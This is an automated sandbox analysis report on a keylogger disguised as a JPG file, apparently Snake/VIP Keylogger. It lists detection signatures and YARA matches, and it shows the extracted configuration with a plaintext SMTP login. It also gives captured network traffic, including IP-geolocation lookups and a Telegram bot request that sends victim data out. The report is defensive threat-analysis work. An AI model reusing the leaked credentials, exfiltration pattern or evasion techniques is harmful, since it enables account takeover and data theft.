Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe

Overview

General Information

Sample name:#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
renamed because original name is a hash value
Original sample name:tutals-megerstse_469253-jpg.exe
Analysis ID:1557587
MD5:b036012ff35a5f3738dcd36e5e9d55b1
SHA1:560db191d96f9559c11f8cd8c5bdbe7722c75aa8
SHA256:f77786d716bdf01be933a41a2315e1db3d671e99cc7f2bcae148869becd52fe0
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe (PID: 2184 cmdline: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe" MD5: B036012FF35A5F3738DCD36E5E9D55B1)
    • svchost.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2200420683.0000000003E30000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 B2 88 44 24 2B 88 44 24 2F B0 1D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 28 entries
          SourceRuleDescriptionAuthorStrings
          0.2.#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe.3e30000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 B2 88 44 24 2B 88 44 24 2F B0 1D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.svchost.exe.7e10000.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.svchost.exe.7e10000.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              2.2.svchost.exe.7e10000.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.svchost.exe.7e10000.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x32d61:$a1: get_encryptedPassword
                • 0x32d35:$a2: get_encryptedUsername
                • 0x32df9:$a3: get_timePasswordChanged
                • 0x32d11:$a4: get_passwordField
                • 0x32d77:$a5: set_encryptedPassword
                • 0x32b44:$a7: get_logins
                • 0x2e43b:$a10: KeyLoggerEventArgs
                • 0x2e40a:$a11: KeyLoggerEventArgsEventHandler
                • 0x32c18:$a13: _encryptedPassword
                Click to see the 76 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", CommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", ParentImage: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, ParentProcessId: 2184, ParentProcessName: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, ProcessCommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", ProcessId: 6256, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", CommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", ParentImage: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, ParentProcessId: 2184, ParentProcessName: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, ProcessCommandLine: "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe", ProcessId: 6256, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:25:57.276302+010028033053Unknown Traffic192.168.2.649728188.114.97.3443TCP
                2024-11-18T13:26:02.985299+010028033053Unknown Traffic192.168.2.649765188.114.97.3443TCP
                2024-11-18T13:26:05.822014+010028033053Unknown Traffic192.168.2.649788188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T13:25:54.903955+010028032742Potentially Bad Traffic192.168.2.649711158.101.44.24280TCP
                2024-11-18T13:25:56.544640+010028032742Potentially Bad Traffic192.168.2.649711158.101.44.24280TCP
                2024-11-18T13:25:59.122927+010028032742Potentially Bad Traffic192.168.2.649734158.101.44.24280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeAvira: detected
                Source: 2.2.svchost.exe.7d50f20.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587"}
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
                Source: Binary string: _.pdb source: svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196307095.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196502305.0000000004010000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196307095.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196502305.0000000004010000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.4637584108.00000000000C1000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.4637584108.00000000000C1000.00000020.00000001.01000000.00000007.sdmp
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09197EE4h2_2_09197C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 091963C0h2_2_091961E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09196D4Ah2_2_091961E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0919862Eh2_2_09198210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0919862Eh2_2_09198206
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0919862Eh2_2_0919855C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_091956F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924FAE3h2_2_0924F810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924E318h2_2_0924DFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924D124h2_2_0924CE78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09243BCCh2_2_09243920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09244024h2_2_09243D78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09246FECh2_2_09246D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09247444h2_2_09247198
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924789Ch2_2_092475F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924447Ch2_2_092441D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924C2DCh2_2_0924C030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092462E4h2_2_09246038
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092492ACh2_2_09249000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924331Ch2_2_09243070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09249704h2_2_09249458
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09249B5Ch2_2_092498B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924C734h2_2_0924C488
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924673Ch2_2_09246490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924CB8Eh2_2_0924C8E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09246B94h2_2_092468E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09243774h2_2_092434C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924B5D4h2_2_0924B328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924D9D4h2_2_0924D728
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092455DCh2_2_09245330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092489FCh2_2_09248750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09248E54h2_2_09248BA8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924BA2Ch2_2_0924B780
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924DE2Ch2_2_0924DB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09245A34h2_2_09245788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09245E8Ch2_2_09245BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924BE84h2_2_0924BBD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092448D4h2_2_09244628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924AD24h2_2_0924AA78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09247CF4h2_2_09247A48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924814Ch2_2_09247EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09244D2Ch2_2_09244A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092485A4h2_2_092482F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924B17Ch2_2_0924AED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0924D57Ch2_2_0924D2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09245184h2_2_09244ED8

                Networking

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2018/11/2024%20/%2021:58:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49788 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49765 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 188.114.97.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2018/11/2024%20/%2021:58:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
